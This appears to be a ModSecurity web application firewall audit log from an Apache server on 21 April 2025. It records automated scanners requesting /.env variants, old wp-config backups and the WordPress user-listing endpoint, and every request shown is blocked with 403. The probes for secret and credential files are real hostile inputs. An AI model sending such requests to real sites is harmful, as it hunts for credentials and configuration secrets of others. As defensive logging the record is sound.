[21/Apr/2025:03:57:46 +0700] aAVfypjcgo97ICfbW9PdEAAAABY 103.236.140.4 47956 103.236.140.4 8181
--a45fe228-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/67.0.3396.99 Chrome/67.0.3396.99 Safari/537.36
Accept-Charset: utf-8
--a45fe228-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a45fe228-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745182666275282 888 (- - -)
Stopwatch2: 1745182666275282 888; combined=381, p1=346, p2=0, p3=0, p4=0, p5=35, sr=143, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a45fe228-Z--
--da04a15b-A--
[21/Apr/2025:04:28:27 +0700] aAVm-3fk8_rbvOkGr1q8-AAAAJA 103.236.140.4 55000 103.236.140.4 8181
--da04a15b-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 206.189.19.19
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 206.189.19.19
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--da04a15b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da04a15b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745184507837793 821 (- - -)
Stopwatch2: 1745184507837793 821; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da04a15b-Z--
--6d893b26-A--
[21/Apr/2025:05:04:46 +0700] aAVvfpjcgo97ICfbW9PhTAAAABM 103.236.140.4 35442 103.236.140.4 8181
--6d893b26-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 181.42.129.203
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 181.42.129.203
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--6d893b26-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6d893b26-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745186686287126 3595 (- - -)
Stopwatch2: 1745186686287126 3595; combined=1527, p1=505, p2=991, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6d893b26-Z--
--58c49441-A--
[21/Apr/2025:05:52:12 +0700] aAV6nHgNnYly62OFre4zXAAAAE0 103.236.140.4 46822 103.236.140.4 8181
--58c49441-B--
GET /wp-config.php.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 82.165.85.33
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 82.165.85.33
X-Forwarded-Proto: http
Connection: close
Accept: */*
--58c49441-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--58c49441-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745189532709965 812 (- - -)
Stopwatch2: 1745189532709965 812; combined=306, p1=268, p2=0, p3=0, p4=0, p5=38, sr=90, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--58c49441-Z--
--8001206f-A--
[21/Apr/2025:06:20:07 +0700] aAWBJ5jcgo97ICfbW9PnBQAAAAk 103.236.140.4 53216 103.236.140.4 8181
--8001206f-B--
GET /wp-config.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 74.208.58.4
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 74.208.58.4
X-Forwarded-Proto: http
Connection: close
Accept: */*
--8001206f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8001206f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745191207452359 804 (- - -)
Stopwatch2: 1745191207452359 804; combined=304, p1=263, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8001206f-Z--
--7932a545-A--
[21/Apr/2025:07:25:58 +0700] aAWQlngNnYly62OFre44VAAAAE8 103.236.140.4 40568 103.236.140.4 8181
--7932a545-B--
GET /.env_sample HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.72.19
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.72.19
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0
Accept-Charset: utf-8
--7932a545-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7932a545-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745195158358228 813 (- - -)
Stopwatch2: 1745195158358228 813; combined=364, p1=324, p2=0, p3=0, p4=0, p5=39, sr=116, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7932a545-Z--
--5ebcca0e-A--
[21/Apr/2025:07:32:13 +0700] aAWSDZjcgo97ICfbW9PszwAAAAM 103.236.140.4 42032 103.236.140.4 8181
--5ebcca0e-B--
GET /.env HTTP/1.0
Host: wooin.epicgamer.org
X-Real-IP: 134.209.25.199
X-Forwarded-Host: wooin.epicgamer.org
X-Forwarded-Server: wooin.epicgamer.org
X-Forwarded-For: 134.209.25.199
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--5ebcca0e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5ebcca0e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745195533902190 794 (- - -)
Stopwatch2: 1745195533902190 794; combined=292, p1=257, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5ebcca0e-Z--
--6b0edf2d-A--
[21/Apr/2025:07:45:35 +0700] aAWVL3fk8_rbvOkGr1rHJQAAAIQ 103.236.140.4 45118 103.236.140.4 8181
--6b0edf2d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.76
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.76
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.99
Accept-Charset: utf-8
--6b0edf2d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6b0edf2d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745196335351012 836 (- - -)
Stopwatch2: 1745196335351012 836; combined=379, p1=338, p2=0, p3=0, p4=0, p5=41, sr=138, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6b0edf2d-Z--
--0176fd70-A--
[21/Apr/2025:07:51:54 +0700] aAWWqngNnYly62OFre45wgAAAEg 103.236.140.4 46616 103.236.140.4 8181
--0176fd70-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )
Accept-Charset: utf-8
--0176fd70-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0176fd70-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745196714104936 891 (- - -)
Stopwatch2: 1745196714104936 891; combined=418, p1=377, p2=0, p3=0, p4=0, p5=41, sr=149, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0176fd70-Z--
--9f3ffe75-A--
[21/Apr/2025:08:27:39 +0700] aAWfC3gNnYly62OFre47pQAAAE8 103.236.140.4 54890 103.236.140.4 8181
--9f3ffe75-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.49.169
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.49.169
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--9f3ffe75-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f3ffe75-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745198859059858 763 (- - -)
Stopwatch2: 1745198859059858 763; combined=323, p1=288, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f3ffe75-Z--
--38d5dc31-A--
[21/Apr/2025:09:05:15 +0700] aAWn25jcgo97ICfbW9PyhgAAABQ 103.236.140.4 35588 103.236.140.4 8181
--38d5dc31-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 206.189.95.232
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 206.189.95.232
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--38d5dc31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--38d5dc31-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745201115804904 755 (- - -)
Stopwatch2: 1745201115804904 755; combined=278, p1=246, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--38d5dc31-Z--
--8207894d-A--
[21/Apr/2025:09:05:18 +0700] aAWn3pjcgo97ICfbW9PyiQAAAAA 103.236.140.4 35620 103.236.140.4 8181
--8207894d-B--
GET /.env HTTP/1.0
Host: bolang.twilightparadox.com
X-Real-IP: 138.197.191.87
X-Forwarded-Host: bolang.twilightparadox.com
X-Forwarded-Server: bolang.twilightparadox.com
X-Forwarded-For: 138.197.191.87
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--8207894d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8207894d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745201118584987 759 (- - -)
Stopwatch2: 1745201118584987 759; combined=312, p1=274, p2=0, p3=0, p4=0, p5=37, sr=84, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8207894d-Z--
--e9240911-A--
[21/Apr/2025:10:35:25 +0700] aAW8_XgNnYly62OFre5DEQAAAEA 103.236.140.4 57640 103.236.140.4 8181
--e9240911-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.211.191.170
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.211.191.170
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Build/PKQ1.180729.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/67.0.3396.87 XWEB/882 MMWEBSDK/190506 Mobile Safari/537.36 MMWEBID/409 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN
Accept-Charset: utf-8
--e9240911-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e9240911-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745206525056252 777 (- - -)
Stopwatch2: 1745206525056252 777; combined=311, p1=263, p2=0, p3=0, p4=0, p5=48, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e9240911-Z--
--199e873e-A--
[21/Apr/2025:13:15:04 +0700] aAXiaHfk8_rbvOkGr1raFwAAAJU 103.236.140.4 39030 103.236.140.4 8181
--199e873e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Accept-Charset: utf-8
--199e873e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--199e873e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745216104976538 781 (- - -)
Stopwatch2: 1745216104976538 781; combined=344, p1=308, p2=0, p3=0, p4=0, p5=36, sr=117, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--199e873e-Z--
--a50b3c29-A--
[21/Apr/2025:14:22:43 +0700] aAXyQ3fk8_rbvOkGr1rd6gAAAIQ 103.236.140.4 55182 103.236.140.4 8181
--a50b3c29-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; MI 5 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/3072 MicroMessenger/7.0.3.1400(0x2700033C) Process/tools NetType/WIFI Language/zh_CN
Accept-Charset: utf-8
--a50b3c29-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a50b3c29-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745220163555971 845 (- - -)
Stopwatch2: 1745220163555971 845; combined=355, p1=308, p2=0, p3=0, p4=0, p5=46, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a50b3c29-Z--
--8c4cd10c-A--
[21/Apr/2025:15:50:40 +0700] aAYG4HgNnYly62OFre5V2AAAAEA 103.236.140.4 48284 103.236.140.4 8181
--8c4cd10c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 128.199.133.65
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 128.199.133.65
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--8c4cd10c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c4cd10c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745225440572637 874 (- - -)
Stopwatch2: 1745225440572637 874; combined=351, p1=302, p2=0, p3=0, p4=0, p5=49, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c4cd10c-Z--
--571d3170-A--
[21/Apr/2025:16:08:26 +0700] aAYLCnfk8_rbvOkGr1rkLwAAAIU 103.236.140.4 52566 103.236.140.4 8181
--571d3170-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.34
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.34
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Accept-Charset: utf-8
--571d3170-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--571d3170-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745226506102248 854 (- - -)
Stopwatch2: 1745226506102248 854; combined=344, p1=301, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--571d3170-Z--
--ce8adf67-A--
[21/Apr/2025:20:29:32 +0700] aAZIPHgNnYly62OFre6sfgAAAFI 103.236.140.4 34042 103.236.140.4 8181
--ce8adf67-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.106
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--ce8adf67-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ce8adf67-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745242172154290 833 (- - -)
Stopwatch2: 1745242172154290 833; combined=358, p1=318, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ce8adf67-Z--
--de20f70a-A--
[21/Apr/2025:20:29:32 +0700] aAZIPJjcgo97ICfbW9NzDAAAABM 103.236.140.4 34056 103.236.140.4 8181
--de20f70a-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.106
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--de20f70a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--de20f70a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745242172349625 804 (- - -)
Stopwatch2: 1745242172349625 804; combined=373, p1=320, p2=0, p3=0, p4=0, p5=52, sr=119, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--de20f70a-Z--
--00d10509-A--
[21/Apr/2025:20:29:32 +0700] aAZIPHgNnYly62OFre6sgAAAAEs 103.236.140.4 34070 103.236.140.4 8181
--00d10509-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.106
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--00d10509-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--00d10509-H--
